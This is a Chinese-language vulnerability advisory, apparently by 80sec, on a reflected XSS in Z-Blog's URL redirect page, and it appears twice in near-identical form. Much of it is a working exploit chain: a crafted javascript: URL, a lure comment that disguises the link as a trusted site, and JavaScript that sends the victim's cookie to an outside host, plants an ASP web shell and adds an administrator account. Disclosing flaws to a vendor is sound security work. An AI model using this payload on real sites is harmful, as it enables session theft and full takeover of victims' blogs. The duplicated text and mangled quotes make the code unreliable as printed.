Z-blog跨站脚本攻击漏洞
程序员文章站
2022-06-19 12:33:55
漏洞说明:Z-Blog是一款基于Asp平台的Blog博客(网志)程序,支持 Wap,支持Firefox,Oprea等浏览器,在国内使用非常广泛,官方主页在http://www.rainbowsoft.org/。Z- blog代码严谨,... 08-10-08...
漏洞说明:z-blog是一款基于asp平台的blog博客(网志)程序,支持 wap,支持firefox,oprea等浏览器,在国内使用非常广泛,官方主页在http://www.rainbowsoft.org/。z- blog代码严谨,前台功能简洁,后台功能强大,这为它的产品安全带来很大的优势,但是80sec在产品中发现一个严重的跨站脚本攻击漏洞,加上产品设计 上的一些问题可能带来严重的后果。
漏洞厂商:http://www.rainbowsoft.org/
漏洞解析:在function/c_urlredirect.asp中,程序对提交的url参数做如下处理
strurl=urldecodeforantispam(request.querystring("url"))
其中urldecodeforantispam是防止垃圾连接的解码函数,其函数处理如下
function urldecodeforantispam(strurl)
dim i,s
for i =1 to len(strurl) step 2
s=s & mid(strurl,i,1)
next
urldecodeforantispam=s
end function
在做如上处理之后程序将在c_urlredirect.asp输出url参数
...
<meta http-equiv="refresh" content="0;url=<%response.write strurl%>“/>
…
精心构造url参数将能构造一个url类型的非持久xss如下:
http://127.0.0.1/z-blog18/function/c_urlredirect.asp?url=jxaxvxaxsxcxrxixpxtx:x"x>xxx
上述url访问之后将引入127.0.0.1/1.js执行,其中可以写任意js代码。
而z-blog的所有安全设计全部用来抵御前台的攻击,对于后台基本没有任何限制,加上antispam功能对用户提交的url连接类似于加密处理,所以很容易就可以诱惑别人访问上述的xss攻击url,可以发表评论如下:
看这个站,有新东西?
[url=http://www.foo.com/function/c_urlredirect.asp?url=jxaxvxaxsxcxrxixpxtx:x"x>xxx]http://www.80sec.com[/url]
用户看到的是http://www.80sec.com这个信任的站点,而一旦点击将在www.foo.com域执行恶意用户指定的js,在该js里可以 写shell,添加用户,偷取cookie然后模拟出真正的转向,整个过程很难发现攻击的意图,80sec提供js如下:
xmlhttp=poster();
cookie=document.cookie;
login=cookie.indexof('password')==-1?0:1;
tolocation='http://www.80sec.com/';
//get cookie
x=new image();
x.src="http://www.80sec.com/c.php?c=" escape(document.cookie);
//get a shell
data="txacontent=<%execute(request("a"))%>“;
postmydata(”http://www.0×37.com/cmd.asp?act=sitefilepst&path=./upload/index.asp&opath=”,data);
//add a user data=”edtid=0&edtlevel=2&edtname=xss2root&edtpassword=d073d5454ffe92bdcd3cbcb77d149df5&edtpasswordre=xss2root&edtemail=null@null.com&edthomepage=&edtalias=”;
postmydata(”http://www.0×37.com/cmd.asp?act=usercrt”,data);
//fool the user
window.location=tolocation;
function poster(){
var request = false;
if(window.xmlhttprequest) {
request = new xmlhttprequest();
if(request.overridemimetype) {
request.overridemimetype(’text/xml’);
}
} else if(window.activexobject) {
var versions = ['microsoft.xmlhttp', 'msxml.xmlhttp', 'microsoft.xmlhttp', 'msxml2.xmlhttp.7.0', 'msxml2.xmlhttp.6.0', 'msxml2.xmlhttp.5.0', 'msxml2.xmlhttp.4.0', 'msxml2.xmlhttp.3.0', 'msxml2.xmlhttp'];
for(var i=0; i
try {
request = new activexobject(versions[i]);
} catch(e) {}
}
}
return request;
}
function postmydata(action,data){
xmlhttp.open(”post”, action, false);
xmlhttp.setrequestheader(’content-type’, ‘application/x-www-form-urlencoded’);
xmlhttp.send(data);
return xmlhttp.responsetext;
}
漏洞状态:已经联系官方,请等待官方公告。
本站内容均为原创,转载请务必保留署名与链接!
z-blog跨站脚本攻击漏洞:http://www.80sec.com/zbog-xss.html
漏洞厂商:http://www.rainbowsoft.org/
漏洞解析:在function/c_urlredirect.asp中,程序对提交的url参数做如下处理
strurl=urldecodeforantispam(request.querystring("url"))
其中urldecodeforantispam是防止垃圾连接的解码函数,其函数处理如下
function urldecodeforantispam(strurl)
dim i,s
for i =1 to len(strurl) step 2
s=s & mid(strurl,i,1)
next
urldecodeforantispam=s
end function
在做如上处理之后程序将在c_urlredirect.asp输出url参数
...
<meta http-equiv="refresh" content="0;url=<%response.write strurl%>“/>
…
精心构造url参数将能构造一个url类型的非持久xss如下:
http://127.0.0.1/z-blog18/function/c_urlredirect.asp?url=jxaxvxaxsxcxrxixpxtx:x"x>x
上述url访问之后将引入127.0.0.1/1.js执行,其中可以写任意js代码。
而z-blog的所有安全设计全部用来抵御前台的攻击,对于后台基本没有任何限制,加上antispam功能对用户提交的url连接类似于加密处理,所以很容易就可以诱惑别人访问上述的xss攻击url,可以发表评论如下:
看这个站,有新东西?
[url=http://www.foo.com/function/c_urlredirect.asp?url=jxaxvxaxsxcxrxixpxtx:x"x>x
用户看到的是http://www.80sec.com这个信任的站点,而一旦点击将在www.foo.com域执行恶意用户指定的js,在该js里可以 写shell,添加用户,偷取cookie然后模拟出真正的转向,整个过程很难发现攻击的意图,80sec提供js如下:
xmlhttp=poster();
cookie=document.cookie;
login=cookie.indexof('password')==-1?0:1;
tolocation='http://www.80sec.com/';
//get cookie
x=new image();
x.src="http://www.80sec.com/c.php?c=" escape(document.cookie);
//get a shell
data="txacontent=<%execute(request("a"))%>“;
postmydata(”http://www.0×37.com/cmd.asp?act=sitefilepst&path=./upload/index.asp&opath=”,data);
//add a user data=”edtid=0&edtlevel=2&edtname=xss2root&edtpassword=d073d5454ffe92bdcd3cbcb77d149df5&edtpasswordre=xss2root&edtemail=null@null.com&edthomepage=&edtalias=”;
postmydata(”http://www.0×37.com/cmd.asp?act=usercrt”,data);
//fool the user
window.location=tolocation;
function poster(){
var request = false;
if(window.xmlhttprequest) {
request = new xmlhttprequest();
if(request.overridemimetype) {
request.overridemimetype(’text/xml’);
}
} else if(window.activexobject) {
var versions = ['microsoft.xmlhttp', 'msxml.xmlhttp', 'microsoft.xmlhttp', 'msxml2.xmlhttp.7.0', 'msxml2.xmlhttp.6.0', 'msxml2.xmlhttp.5.0', 'msxml2.xmlhttp.4.0', 'msxml2.xmlhttp.3.0', 'msxml2.xmlhttp'];
for(var i=0; i
try {
request = new activexobject(versions[i]);
} catch(e) {}
}
}
return request;
}
function postmydata(action,data){
xmlhttp.open(”post”, action, false);
xmlhttp.setrequestheader(’content-type’, ‘application/x-www-form-urlencoded’);
xmlhttp.send(data);
return xmlhttp.responsetext;
}
漏洞状态:已经联系官方,请等待官方公告。
本站内容均为原创,转载请务必保留署名与链接!
z-blog跨站脚本攻击漏洞:http://www.80sec.com/zbog-xss.html